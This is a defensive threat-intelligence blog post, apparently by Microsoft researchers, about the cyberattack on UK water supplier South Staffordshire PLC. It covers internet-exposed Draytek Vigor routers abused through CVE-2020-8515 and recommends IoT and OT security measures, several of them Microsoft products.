Securing IoT devices against attacks that target critical infrastructure

South Staffordshire PLC, a company that supplies water to over one million customers in the United Kingdom, notified its customers in August of being a target of a criminal cyberattack. This incident highlights the sophisticated threats that critical industries face today.  According to South Staffordshire, the breach did not appear to have caused damage to the systems and it did not impact their ability to supply safe water to their customers.

The attack brings to light the risk of threat actors gaining access to industrial control system (ICS) environments. According to reports, a group associated with the Cl0p ransomware claimed responsibility for the attack, which followed a familiar extortion model wherein attackers extort the target for exfiltrated data without encrypting the organization’s files. After the attack, confidential documents, along with screenshots of the supervisory control and data acquisition (SCADA) system used by water treatment plants were leaked.

As details of the attack and the vector used to access South Staffordshire PLC’s networks are limited, the Microsoft Defender for IoT research team did further research on techniques used by threat actors in similar attacks. Microsoft researchers have previously observed activity relating to internet-exposed IoT devices across different industries, which may be used as a potential foothold into OT networks. Threat actors gain access by deploying malware on information technology (IT) devices and then crossing the boundary to the operational technology (OT) part of the network to target high-value operational assets, or by compromising unmanaged, usually less secure IoT and OT devices.

IoT devices in critical infrastructure networks

IoT devices offer significant value to organizations and extend beyond environmental monitoring sensors to common office equipment and network devices. However, IoT devices in critical infrastructure networks, if not properly secured, increase the risk of unauthorized access to operational assets and networks. Improper configurations such as default credentials and unpatched vulnerabilities are often abused by threat actors to gain network or device access. Once access is established, attackers could identify other assets on the same network, perform reconnaissance, and plan large-scale attacks on sensitive equipment and devices.

In monitoring threats against critical infrastructure and utilities, Microsoft researchers investigated water utility providers in the United Kingdom with exposed IoT devices within their networks. Using open-source intelligence (OSINT) and Microsoft Defender Threat Intelligence data, the team searched for exposed IoT devices integrated into the networks of water utility providers and found that such facilities were using Draytek Vigor routers, which are intended for home use.

Map showing global distribution of Draytek Vigor devices exposed to the Internet
Figure 1. Global mapping of internet-exposed Draytek Vigor devices

With difficult-to-patch devices such as printers, cameras, routers, and gateway devices overlooked as potential footholds into networks, they are often left exposed. In analyzing Microsoft threat intelligence, Microsoft researchers observed threat actors abusing a known remote code execution vulnerability in Draytek Vigor devices (CVE-2020-8515) to deploy the Mirai botnet. Once attackers establish device access, remote code execution vulnerabilities such as CVE-2020-8515 can then allow attackers to run malicious commands on devices, move laterally within the network, and access other vulnerable devices which were not directly exposed to the internet such as SCADA systems. 

In water treatment applications, SCADA systems allow water plants to monitor levels of specific chemicals and toxins and to collect records of the systems. While the attack against South Staffordshire PLC does not appear to have included the abuse of these devices, the release of files pertaining to OT systems constitutes a high-risk to operations and highlights the importance of network segmentation to protect devices and networks from lateral movement.

Defending critical networks

Attacks on utility providers’ OT networks and devices are high-risk events that can range from data theft to the manipulation of devices controlling the operations. Such events can lead to the interruption of operations, or in severe cases, potential harm to individuals and customers (For example, when hackers gained access to the water system of one Florida city as reported in February 2021).

Given the severity of these attacks and their potential impact on the utility providers’ operations and even the safety of their customers, it becomes crucial to recognize the importance of proper security practices around IoT & OT unmanaged devices to ensure that such attacks do not happen. Defenses set up for OT networks must be comprehensive, able to prevent unauthorized system access and should include detections for abnormal, unfamiliar, and malicious behaviors after a breach.

It is important to protect assets and have strict security protocols in place for how and when devices and data can be accessed. We recommend the following defense strategies for organizations with both IoT and OT devices within their networks:  

  • Adopt a comprehensive IoT and OT security solution such as Microsoft Defender for IoT to allow visibility and monitoring of all IoT and OT devices, threat detection and response, and integration with SIEM/SOAR and XDR platforms such as Microsoft Sentinel and Microsoft Defender 365.
  • Enable vulnerability assessments to identify unpatched devices in the organizational network and set workflows for initiating appropriate patch processes through  Microsoft Defender Vulnerability Management and Microsoft Defender for Endpoint with the Microsoft Defender for IoT add-on.
  • Reduce the attack surface by eliminating unnecessary internet connections to IoT devices and OT control systems. Implement Zero Trust practices by applying network segmentation to prevent an attacker from moving laterally and compromising assets after intrusion. IoT devices and OT networks should be isolated from IT and OT networks with firewalls. Extend vulnerability and exposure control beyond the firewall with Microsoft Defender External Attack Surface Management. Turn on attack surface reduction rules in Microsoft Defender for Endpoint to prevent common attack techniques such as those used by ransomware groups.
  • Increase network security by enforcing multi factor authentication (MFA) methods such as Azure Active Directory MFA. Enable network protection to prevent applications or users from accessing malicious domains and other malicious content on the internet.

David Atch, Ilana Sivan, and Mae Dotan, Microsoft Defender for IoT Research Team
Ross Bevington, Microsoft Threat Intelligence Center (MSTIC)
Jaclyn Blumenfield, Microsoft Defender Threat Intelligence